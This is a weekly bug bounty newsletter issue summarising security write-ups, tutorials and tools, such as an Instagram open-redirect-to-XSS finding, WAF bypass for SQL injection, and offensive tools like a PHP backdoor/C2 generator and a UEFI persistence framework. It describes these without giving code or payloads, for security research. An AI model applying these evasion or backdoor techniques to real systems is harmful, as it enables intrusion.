Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from 11 to 18 of September.
Our favorite 5 hacking items
1. Videos of the week
How to Master FFUF for Bug Bounties and Pen Testing & Everything you need to know about FFUF
Finding Hidden Files and Folders on IIS/.NET (Recon), Hacking IIS (APIs and using BigQuery) (Part 2) & Finding Hidden Files and Folders on IIS using BigQuery
These are two very informative videos with accompanying blog posts. Michael Skelton (@codingo_)’s guide to ffuf is so good that the tool’s creator, @joohoi, is linking to it from the main ffuf repo!
Shubham Shah (@infosec_au) shares cool explanations on bruteforcing IIS hidden files and folders, and leveraging BigQuery (without ruining yourself!).
2. Writeups of the week
$25K Instagram Almost XSS Filter Link — Facebook Bug Bounty (Facebook, $25,000)
When you browse Instagram and find former Australian Prime Minister Tony Abbott’s passport number
Bug bounty amounts aren’t everything, but they’re often an indicator of the seriousness of a vulnerability. Andres Alonso’s (@al0nnso) finding is impressive considering not only the bounty but also the hardened target and his young age. He found an open redirect on Facebook that could be escalated to XSS. WAF bypass was possible by injecting code to change the page’s charset and encoding the XSS payload.
The second writeup is a fun vulnerability disclosure story. @mangopdf found a former Australian Prime Minister’s boarding pass on Instagram and could use it to obtain his passport and phone numbers. Followed an entertaining crusade to report this without getting arrested.
3. Tool of the week
Graphtage is a command line utility and library for semantically comparing and merging tree-like structures (e.g. JSON, JSON5, XML, HTML, YAML, TOML and CSV). It’s a great tool for diffing files and automating recon data analysis.
4. Non technical item of the week
Hacking on Bug Bounties for Four Years
This is an illuminating read for anyone who is doing bug bounties who aspiring to. @infosec_au shares his past four years experience as a part-time bug hunter. This includes the type of bugs he reported, bounty amounts for each, total earnings, his methodology, collaboration experience… Amazing insights of a seasoned bug hunter’s life!
5. Tutorial of the week
Bypassing WAF by Playing with Parameters
This is an introduction to HTTP Parameter Fragmentation, and how it can be leveraged to bypass WAFs and exploit SQL injection. A nice read to get familiar with this technique!
Other amazing things we stumbled upon this week
Webinars & Webcasts
Slides & Workshop material
Medium to advanced
Responsible(ish) disclosure writeups
Bug bounty writeups
See more writeups on The list of bug bounty writeups.
If you don’t have time
- kb: A minimalist knowledge base manager
- Arsenal: Quick inventory, reminder and launcher for pentest commands
- Mapboxapiscanner: Python script to determine whether a leaked/found Mapbox API Key is vulnerable to unauthorized access by other applications or not
- query-json: Faster and simpler implementation of jq in Reason Native
- nvd-scrapper: Pull data from the national vulnerability database and push it to a GCP bucket
- OneFuzz: A self-hosted Fuzzing-As-A-Service platform by Microsoft
- GKE Auditor: A tool by Google to detect a set of common Google Kubernetes Engine misconfigurations
- LambScan & Offensive Security Testing Using Cloud Tools: AWS Lambda-based port scanner
- wordlist_generator: Unique wordlist generator of unique wordlists
- Tafferugli: Twitter Analysis Framework #OSINT
- Darkshot: Lightshot scraper on steroids with OCR #OSINT
- mzap: Multiple target ZAP Scanning
- Bantam: A PHP backdoor management and generation tool/C2 featuring end to end encrypted payload streaming designed to bypass WAF, IDS, SIEM systems
- crlfmap: Go tool to find HTTP Splitting vulnerabilities
- MIDNIGHTTRAIN & Intro: A Covert Stage-3 Persistence Framework weaponizing UEFI variables
Misc. pentest & bug bounty resources
Bug bounty & Pentest news
Breaches & Attacks
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 09/11/2020 to 09/18/2020.